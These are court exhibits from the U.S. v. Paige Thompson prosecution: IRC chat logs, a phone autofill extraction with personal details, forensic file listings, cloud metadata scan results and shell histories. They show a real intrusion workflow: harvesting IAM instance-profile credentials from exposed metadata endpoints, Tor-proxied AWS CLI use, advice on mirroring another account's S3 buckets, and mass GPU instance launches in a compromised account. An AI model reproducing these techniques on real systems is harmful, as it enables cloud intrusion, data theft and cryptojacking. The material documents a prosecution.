# APPENDIX A

# EXHIBIT 455

IRC Chats from 1B52 - md126  ▸  .znc  ▸  moddata  ▸  log  ▸  erratic  ▸  freenode  ▸  #netcrave

lder

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-05-06.log | 5/6/2019 2:47 PM | Text Document | 19 KB |
| 2019-05-07.log | 5/7/2019 4:25 PM | Text Document | 2 KB |
| 2019-05-08.log | 5/8/2019 1:15 PM | Text Document | 2 KB |
| 2019-05-09.log | 5/9/2019 10:42 AM | Text Document | 9 KB |
| 2019-05-10.log | 5/10/2019 10:13 AM | Text Document | 1 KB |
| 2019-05-11.log | 5/11/2019 3:21 PM | Text Document | 1 KB |
| 2019-05-12.log | 5/11/2019 10:51 PM | Text Document | 1 KB |
| 2019-05-13.log | 5/13/2019 4:51 PM | Text Document | 1 KB |
| 2019-05-14.log | 5/14/2019 12:07 AM | Text Document | 1 KB |
| 2019-05-15.log | 5/15/2019 8:31 AM | Text Document | 1 KB |
| 2019-05-16.log | 5/16/2019 8:43 AM | Text Document | 1 KB |
| 2019-05-18.log | 5/18/2019 2:06 AM | Text Document | 1 KB |
| 2019-05-20.log | 5/20/2019 12:08 PM | Text Document | 1 KB |
| 2019-05-21.log | 5/20/2019 5:30 PM | Text Document | 1 KB |
| 2019-05-23.log | 5/23/2019 9:14 AM | Text Document | 1 KB |
| 2019-05-24.log | 5/24/2019 3:14 PM | Text Document | 1 KB |
| 2019-05-25.log | 5/25/2019 3:30 PM | Text Document | 5 KB |
| 2019-05-27.log | 5/27/2019 11:10 AM | Text Document | 2 KB |
| 2019-05-28.log | 5/28/2019 8:23 AM | Text Document | 5 KB |
| 2019-05-29.log | 5/29/2019 3:07 PM | Text Document | 1 KB |
| 2019-05-30.log | 5/30/2019 1:49 PM | Text Document | 2 KB |
| 2019-05-31.log | 5/31/2019 5:27 AM | Text Document | 1 KB |
| 2019-06-01.log | 5/31/2019 6:48 PM | Text Document | 1 KB |
| 2019-06-02.log | 6/2/2019 2:46 PM | Text Document | 1 KB |
| 2019-06-03.log | 6/3/2019 5:58 AM | Text Document | 1 KB |
| 2019-06-04.log | 6/4/2019 8:42 AM | Text Document | 5 KB |
| 2019-06-05.log | 6/5/2019 10:49 AM | Text Document | 24 KB |
| 2019-06-06.log | 6/6/2019 9:07 AM | Text Document | 1 KB |
| 2019-06-07.log | 6/6/2019 11:20 PM | Text Document | 1 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 455
Admitted_____

2019-06-05.log

```
85  [07:27:49] <erratic> I'll prob fuck with it later, like I said last night, so much shit, so much. not enough time.
86  [07:30:27] <erratic> I dunno my friend said something to me awhile back thats got me thinking about carding alot lately
87  [07:30:47] <erratic> Luhn algorithm shit
88  [07:31:01] <erratic> and other issuance characteristics
89  [07:37:30] <erratic> evidently he's got a mag track writer
90  [07:37:47] <erratic> and emboss kits
91  [07:37:57] <erratic> and a lot of other shit
92  [07:38:28] <erratic> a poor ass white girl like me need those
93  [07:38:33] <erratic> to go shopping
```

2019-06-05.log ☒

```
 96  [07:53:40] <erratic> aws --profile astem iam create-login-profile --cli-input-json file://create-login-profile.json
 97  [07:53:43] <erratic> {
 98  [07:53:46] <erratic>     "LoginProfile": {
 99  [07:53:48] <erratic>         "UserName": "default",
100  [07:53:51] <erratic>         "CreateDate": "2019-06-05T07:52:15Z",
101  [07:53:53] <erratic>         "PasswordResetRequired": false
102  [07:53:56] <erratic>     }
103  [07:53:58] <erratic> }
104  [07:54:01] <erratic> aws sts get-caller-identity --profile astem
105  [07:54:03] <erratic> { "UserId": "AIDAU55F6ZVKSUXFH4SMH", "Account":        4197", "Arn":
     "arn:aws:iam::         4197:user/default"
106  [07:54:06] <erratic> }
107  [07:54:09] <erratic> heh heh heh heh heh
108  [07:54:11] <erratic> gottem
109  [07:54:14] <erratic> smells like bacon
110  [07:54:28] <erratic> anyone want a domain?
111  [07:54:44] <erratic> how about a storage gateway :D
112  [07:59:27] <erratic> how about... a big fat db.r4.large dump
113  [07:59:51] <erratic> hugedumps.com
```

2019-06-05.log 🗴

```
118  [10:01:52] <erratic> I think if we all worked together we could turn a substantial number of the internet's rogue bots into our
     own outlet that would finance our projects
119  [10:02:36] <erratic> I do it all the time
120  [10:02:42] <erratic> just think of what we could do collectively
121  [10:03:34] <erratic> as long as we dont get much bigger of a group than we are now
122  [10:04:25] <erratic> I'm pretty careless but I'm careless because nobody gives a fuck
123  [10:04:33] <erratic> but I could stand to be less careless
124  [10:05:09] <erratic> seriously like
125  [10:05:13] <erratic> the shit I've done
126  [10:05:27] <erratic> way worse than what adrian lamo got arrested for initially
127  [10:05:41] <erratic> and that guy made his whole fucking career off being a scene whore
128  [10:05:53] <erratic> RIP adrian
```

# EXHIBIT 461

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ EFNet ▸ nance

| Name | Date modified | Type |
|------|---------------|------|
| 2019-07-16.log | 7/16/2019 9:07 AM | Text Document |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 461
Admitted_____

2019-07-16.log

```
 1

 2   [11:40:47] <erratic> you'll have to apt-get install tor and proxychains ..
 3   [11:40:50] <erratic> and aws-cli
 4   [11:41:12] <erratic> then you can verify it with `aws sts get-caller-identity`
 5   [11:41:30] <erratic> but you'll wanna do something like
 6   [11:41:40] <erratic> alias aws="proxychains4 aws"
 7   [11:41:48] <erratic> so that it gets torified
 8   [11:42:03] <nance> Neat!
 9   [11:42:28] <erratic> https://termbin.com/3qn7 proxychains.conf if you need it
10   [11:43:13] <erratic> yeah aws is great, except when someone steals your IAM
     instance profile that has full access to the acount :)
11   [11:43:58] <erratic> you may have to edit torrc to get it to work right
12   [11:44:00] <erratic> sec
13   [11:44:53] <erratic> yeah I dont have anything special in mine so i think all
     you gotta do is apt-get install tor && systemctl enable tor && systemctl start
     tor
14   [11:46:17] <erratic> if you wanted to scrape somebodys s3 buckets you can do ..
15

16   [11:47:10] <erratic> run that in a directory like scrapes and also change the
     name phillips to whatever you want, I usually use the company name that owns the
     account...
17   [11:47:32] <erratic> lolz
18   [11:47:48] <erratic> yeah you'll need jq (apt-get install jq) for that
19   [11:47:59] <erratic> also gnu parallel (apt-get install parallel)
20   [11:48:57] <erratic> I would actually not rely on alias aws="proxychains4 aws"
     for that and rather change the two usages of aws in that 1 liner to proxychains4
     aws explicitly because the environment forks and it doesn't copy the parent
     unlessyou have set -a or something
21   [11:50:33] <erratic> that will straight up mirror all of an accounts s3 buckets
     though which you'll wanna make sure you have the diskspace for
22   [11:51:25] <nance> Interesting. I'll have to read thru this more when I get to a
     proper terminal
23   [11:51:30] <nance> Phone irc sucks
24   [11:51:32] <erratic> but yeah if you just wanna use it to learn how to do some
     shit with aws go for it its not my shit lol
25   [11:51:38] <erratic> no worries :)
26   [11:52:07] <nance> I just legit need to learn AWS and s3 for work lol
27   [11:52:30] <nance> Make the jr dev ops dudes feel threatened
28   [11:53:48] <erratic> definitely yeah go for it if you wanna use that account for
     practice, should be fine if you use tor even without Ive fucked with a lot of
     aws accounts from my own address because most people don't have a fucking clue
     how to use logging
```

# EXHIBIT 506



# Extraction Report
Apple iPhone

## Autofill (36)

| Details | | Deleted |
|---|---|---|
| **cardNumber:** 12726229<br>Source: Chrome | Timestamp: 3/28/2019 2:58:42 AM(UTC-7) | |
| **cardNumber:** 12726229<br>Source: Chrome | Timestamp: 3/28/2019 2:58:42 AM(UTC-7) | |
| **j_username:** josephbaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:57:19 AM(UTC-7) | |
| **j_username:** josephbaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:57:19 AM(UTC-7) | |
| **username:** josephbaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** josephbaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** joseph.baleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:39 AM(UTC-7) | |
| **username:** joseph.baleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:39 AM(UTC-7) | |
| **answer:** pizza<br>Source: Chrome | Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **answer:** pizza<br>Source: Chrome | Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>Source: Chrome | Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **dobDay:**<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobDay:**<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:**<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:**<br>Source: Chrome | Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 506
Admitted_____

| | | |
|---|---|---|
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberAreaCode:** 425<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberSuffix:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberPrefix:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.city:** Seattle<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |

506-002

# EXHIBIT 643



# Not Found

The requested URL /latest/meta-data was not found on this server.

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 643
Admitted_____



# Forbidden

You don't have permission to access /latest/meta-data on this server.





| Name ▾ | Description | Type | Size | Created | Modified ▴ | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| 📁 .. = aws_hacking_shit (5,549,429) | existing | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxrwx | 7,044,587... |
| 📁 .. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| 📄 scan.log4 | existing | log4 | 39 B | 07/10/2019 10:17... | 04/13/2019 17:17... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| 📄 run.sh | existing, already viewed | sh | 293 B | 07/10/2019 10:17... | 04/03/2019 13:45... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| 📄 README | existing, already viewed | ascii_u... | 326 B | 07/10/2019 10:16... | 03/22/2019 01:23... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| 📄 prescan.sh | existing, already viewed | sh | 416 B | 07/10/2019 10:16... | 04/06/2019 17:53... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| 📄 ports.txt | existing | txt | 96 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,672... |
| 📄 pass | existing | | 17 B | 07/10/2019 10:19... | 03/14/2019 07:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,07... |
| 📄 new_all2.xz | existing, already viewed | xz | 28.1 MB | 07/10/2019 10:16... | 04/06/2019 16:33... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... |
| 📄 new_all.xz | existing | xz | 141 MB | 07/10/2019 10:16... | 03/19/2019 00:58... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,617... |
| 📄 new-ec2-credentials-describe-instances | existing, already viewed | json | 115 KB | 07/10/2019 10:16... | 03/04/2019 10:08... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,328 |
| 📄 nano | existing, already viewed | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,709... |
| 📄 miner.tar | existing | tar | 13.4 MB | 07/10/2019 10:17... | 04/04/2019 15:42... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,832 |
| 📄 metadata_to_date_03_19_19 | existing | | 29.7 KB | 07/10/2019 10:16... | 03/19/2019 04:35... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,424 |
| 📄 metadata.scanner.joblog | existing | tsv | 1.1 GB | 07/10/2019 10:17... | 03/14/2019 17:30... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,008 |
| 📄 mega_metadata.txt | existing, already viewed | txt | 46.6 KB | 07/10/2019 10:17... | 04/02/2019 07:40... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,808 |
| 📄 limits.conf | existing | ascii_u... | 268 B | 07/10/2019 10:16... | 04/06/2019 18:05... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| 📄 ip-ranges.json | existing, already viewed | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,368 |
| 📄 infobloxctodockerstuff.sh | existing | sh | 4.4 KB | 07/10/2019 10:17... | 03/14/2019 08:25... | 07/19/2019 06:24... | Crwxrwxrwx | 28,331,680 |

```
▼ Partition      □ File      ◄ Preview    📄 Details    ⚌ Gallery    📅 Calendar    ☰ Legend    ⏐   Raw   Text   ▼   🔊   ⚌   ◯
../metadata_old4/52.74.60.204:443:ami-id
../metadata_old4/3.83.242.169:443:ami-id
../metadata_old4/52.210.225.235:443:ami-id
../metadata_old4/54.214.50.238:443:ami-id
../metadata_old4/34.205.178.115:80:ami-id
../metadata_old4/18.209.225.93:80:ami-id
../metadata_old4/34.213.27.38:443:ami-id
../metadata_old4/52.196.76.216:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/13.113.12.133:80:ami-id
../metadata_old4/52.208.97.11:443:ami-id
../metadata_old4/34.242.245.102:443:ami-id
../metadata_old4/52.86.111.16:80:ami-id
../metadata_old4/54.162.202.98:443:ami-id
../metadata_old4/18.209.2.12:443:ami-id
../metadata_old4/52.90.137.8:80:ami-id
../metadata_old4/13.57.7.185:80:ami-id
../metadata_old4/34.201.163.169:443:ami-id
../metadata_old4/34.197.128.100:443:ami-id
../metadata_old4/35.154.251.51:443:ami-id
../metadata_old4/54.174.65.134:80:ami-id
../metadata_old4/13.229.149.238:443:ami-id
../metadata_old4/100.25.211.127:80:ami-id
../metadata_old4/52.31.8.36:443:ami-id
../metadata_old4/184.72.249.27:443:ami-id
../metadata_old4/100.26.57.181:80:ami-id
../metadata_old4/52.64.104.205:443:ami-id
../metadata_old4/52.66.77.130:443:ami-id
../metadata_old4/174.129.17.248:443:ami-id
../metadata_old4/54.207.9.93:443:ami-id
../metadata_old4/52.59.195.80:443:ami-id
../metadata_old4/52.18.89.222:443:ami-id
../metadata_old4/52.202.171.240:443:ami-id
../metadata_old4/52.52.171.1:443:ami-id
../metadata_old4/52.29.7.60:443:ami-id
../metadata_old4/34.204.166.231:443:ami-id
../metadata_old4/35.168.25.243:443:ami-id
../metadata_old4/54.156.183.45:80:ami-id
../metadata_old4/3.89.177.190:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/54.72.195.241:443:ami-id
```

```
 1   34.203.127.201:443:ami-id
 2   54.255.226.147:443:ami-id
 3   13.228.13.116:443:ami-id
 4   52.50.114.108:443:ami-id
 5   54.194.234.17:443:ami-id
 6   35.174.95.137:80:ami-id
 7   52.55.150.227:443:ami-id
 8   3.80.135.207:80:ami-id
 9   52.213.221.16:443:ami-id
10   13.232.74.206:80:ami-id
11   34.233.5.227:80:ami-id
12   34.233.5.227:443:ami-id
13   13.251.122.190:443:ami-id
14   35.168.232.110:443:ami-id
15   54.223.175.32:443:ami-id
16   18.130.245.251:443:ami-id
17   63.32.127.100:443:ami-id
18   3.83.242.169:80:ami-id
19   18.130.169.121:443:ami-id
20   54.77.46.101:443:ami-id
21   34.253.221.101:443:ami-id
22   3.87.29.227:80:ami-id
23   35.174.208.165:80:ami-id
24   54.233.188.211:80:ami-id
25   52.5.19.114:443:ami-id
26   35.168.208.144:80:ami-id
27   35.168.208.144:443:ami-id
28   13.233.31.108:80:ami-id
29   18.231.94.56:443:ami-id
30   18.205.47.75:443:ami-id
31   54.232.231.134:443:ami-id
32   3.120.251.179:80:ami-id
33   52.57.128.255:443:ami-id
34   35.157.22.118:443:ami-id
35   52.210.225.235:443:ami-id
36   18.184.143.8:443:ami-id
37   18.195.209.161:443:ami-id
38   54.85.167.138:443:ami-id
39   52.208.25.41:443:ami-id
40   35.162.65.136:443:ami-id
41   ../metadata_old2/18.207.213.8.metadata.8888:ami-id
42   ../metadata_old2/13.233.67.216.metadata.443:ami-id
43   ../metadata_old2/23.22.9.234.metadata.80:ami-id
44   ../metadata_old2/122.248.238.156.metadata.443:ami-id
45   ../metadata_old2/52.91.2.197.metadata.443:ami-id
46   ../metadata_old2/52.199.114.150.metadata.8001:ami-id
47   ../metadata_old2/54.162.202.98.metadata.80:ami-id
48   ../metadata_old2/52.207.132.15.metadata.443:ami-id
49   ../metadata_old2/35.174.95.137.metadata.80:ami-id
50   ../metadata_old2/34.245.86.161.metadata.8888:ami-id
51   ../metadata_old2/52.20.131.53.metadata.443:ami-id
52   ../metadata_old2/34.213.27.38.metadata.443:ami-id
53   ../metadata_old2/54.238.181.176.metadata.80:ami-id
54   ../metadata_old2/52.4.234.164.metadata.443:ami-id
55   ../metadata_old2/54.218.1.67.metadata.443:ami-id
56   ../metadata_old2/54.189.245.163.metadata.443:ami-id
57   ../metadata_old2/54.252.210.83.metadata.81:ami-id
58   ../metadata_old2/54.214.50.238.metadata.443:ami-id
59   ../metadata_old2/34.203.219.137.metadata.443:ami-id
60   ../metadata_old2/54.89.239.139.metadata.3128:ami-id
61   ../metadata_old2/3.104.89.98.metadata.443:ami-id
62   ../metadata_old2/52.193.82.153.metadata.3128:ami-id
63   ../metadata_old2/35.161.229.177.metadata.3128:ami-id
```





# EXHIBIT 806

```
529

530   5516  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | .InstanceType'
531   5517  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
532   5518  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
533   5519  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
534   5520  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
535   5521  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 3 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
536   5522  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
537   5523  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
538   5524  aws ec2 run-instances --region eu-west-1 --instance-type p2.2xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
539   5525  aws ec2 run-instances --region eu-west-1 --instance-type p2.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
540   5526  aws ec2 run-instances --region eu-west-1 --instance-type p3.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
541   5536  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
542   5537  aws ec2 run-instances --region eu-west-1 --instance-type g3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
543   5538  aws ec2 run-instances --region eu-west-1 --instance-type g3.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
544   5539  aws ec2 run-instances --region eu-west-1 --instance-type g3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
545   5540  aws ec2 run-instances --region eu-west-1 --instance-type g3.4xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
546   5541  aws ec2 run-instances --region eu-west-1 --instance-type g3s.xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address
      --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
547   5542  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | [.InstanceType, .PublicIpAddress]'
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 806
Admitted_____

```
577  # host            ▓▓▓▓▓▓-g3.4xlarge-1
578  #    HostName             34.254.249.212
579  #    User                 ubuntu
580  #    IdentityFile         ~/.ssh/▓▓▓▓▓▓▓▓-eu-west-1.id_rsa
581  #    IdentitiesOnly       yes
582
583  # host  ▓▓▓▓▓▓▓▓▓-g3.4xlarge-2
584  #    HostName             34.251.109.44
585  #    User                 ubuntu
586  #    IdentityFile         ~/.ssh/▓▓▓▓▓▓▓▓-eu-west-1.id_rsa
587  #    IdentitiesOnly       yes
588
589  # host  ▓▓▓▓▓▓▓-g3s.xlarge-1
590  #    HostName             52.211.167.148
591  #    User                 ubuntu
592  #    IdentityFile         ~/.ssh/▓▓▓▓▓▓▓▓-eu-west-1.id_rsa
593  #    IdentitiesOnly       yes
594
595  # host  ▓▓▓▓▓▓▓-g3s.xlarge-2
596  #    HostName             54.154.112.182
597  #    User                 ubuntu
598  #    IdentityFile         ~/.ssh/▓▓▓▓▓▓▓▓-eu-west-1.id_rsa
599  #    IdentitiesOnly       yes
600
601  # host  ▓▓▓▓▓▓▓-g3.16xlarge-1
602  #    HostName             34.243.40.14
603  #    User                 ubuntu
604  #    IdentityFile         ~/.ssh/▓▓▓▓▓▓▓▓-eu-west-1.id_rsa
605  #    IdentitiesOnly       yes
606
```

# EXHIBIT 807

awsscan.txt

```
 1  http://52.202.95.84:8181        "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
 2  http://52.199.114.150:8001      "InstanceProfileArn" : "arn:aws:iam::031937983129:instance-profile
 3  http://52.79.227.180:3000       "InstanceProfileArn" : "arn:aws:iam::715120914553:instance-profile
 4  http://54.200.150.203:8001      "InstanceProfileArn" : "arn:aws:iam::766845206390:instance-profile
 5  http://13.232.127.99:8080       "InstanceProfileArn": "arn:aws:iam::288783958947:instance-profile/
 6  http://13.232.127.99:8000       "InstanceProfileArn": "arn:aws:iam::366763853509:instance-profile/
 7  https://63.32.127.100:443       "InstanceProfileArn" : "arn:aws:iam::235087924053:instance-profile
 8  https://35.162.65.136:443       "InstanceProfileArn" : "arn:aws:iam::427884659784:instance-profile
 9  http://52.59.198.77:8080        "InstanceProfileArn": "arn:aws:iam::346734181617:instance-profile/
10  http://52.59.198.77:8000        "InstanceProfileArn": "arn:aws:iam::387744940020:instance-profile/
11  http://52.72.216.229:8181       "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
12  http://13.52.44.117:80       "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile/wai
13  http://52.36.188.73:8088        "InstanceProfileArn" : "arn:aws:iam::816892654645:instance-profile
14  http://54.183.173.34:8080       "InstanceProfileArn": "arn:aws:iam::513932806757:instance-profile/
15  http://54.183.173.34:8000       "InstanceProfileArn": "arn:aws:iam::503276176098:instance-profile/
16  http://34.210.95.136:3128       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
17  https://13.52.44.117:443        "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile
18  http://34.210.95.136:3129       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
19  https://54.214.49.137:443       "InstanceProfileArn" : "arn:aws:iam::756537995458:instance-profile
20  http://52.79.116.117:3128       "InstanceProfileArn" : "arn:aws:iam::140068605264:instance-profile
21  http://18.231.1.242:8085        "InstanceProfileArn" : "arn:aws:iam::241211947956:instance-profile
22  http://18.231.1.242:8082        "InstanceProfileArn" : "arn:aws:iam::241211947956:instance-profile
23  http://34.233.83.33:8181        "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
24  http://34.197.158.104:8181      "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
25  http://34.218.113.19:3129       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
26  http://34.218.113.19:3128       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
27  http://13.232.182.109:3128      "InstanceProfileArn" : "arn:aws:iam::030119758977:instance-profile
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 807
Admitted_____

aws.commands

849



host weighttrainer-1
HostName        54.148.234.88
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

host weighttrainer-2
HostName        34.220.189.209
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

host weighttrainer-3
HostName        34.215.151.134
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

host weighttrainer-4
HostName        34.217.212.132
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

host weighttrainer-5
HostName        52.38.153.12
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

host weighttrainer-6
HostName        54.245.190.196
User            ubuntu
IdentityFile    ~/.ssh/weighttrainer.id_rsa
IdentitiesOnly  yes

iam_fulllog.txt

```
31  http://52.72.216.229:8181      }http://13.52.44.117:80 {
32  http://13.52.44.117:80         "Code" : "Success",
33  http://13.52.44.117:80         "LastUpdated" : "2019-04-19T17:45:12Z",
34  http://13.52.44.117:80         "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile                              ",
35  http://13.52.44.117:80         "InstanceProfileId" : "AIPAJZBH4KPUVYKS5QQDU"
36  http://13.52.44.117:80         }http://52.36.188.73:8088   {
37  http://52.36.188.73:8088          "Code" : "Success",
38  http://52.36.188.73:8088          "LastUpdated" : "2019-04-19T17:21:34Z",
39  http://52.36.188.73:8088          "InstanceProfileArn" : "arn:aws:iam::816892654645:instance-profile                    :",
40  http://52.36.188.73:8088          "InstanceProfileId" :                       "
41  http://52.36.188.73:8088          }http://52.87.83.135:80 <html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{
42  http://52.87.83.135:80         "Code" : "Success",
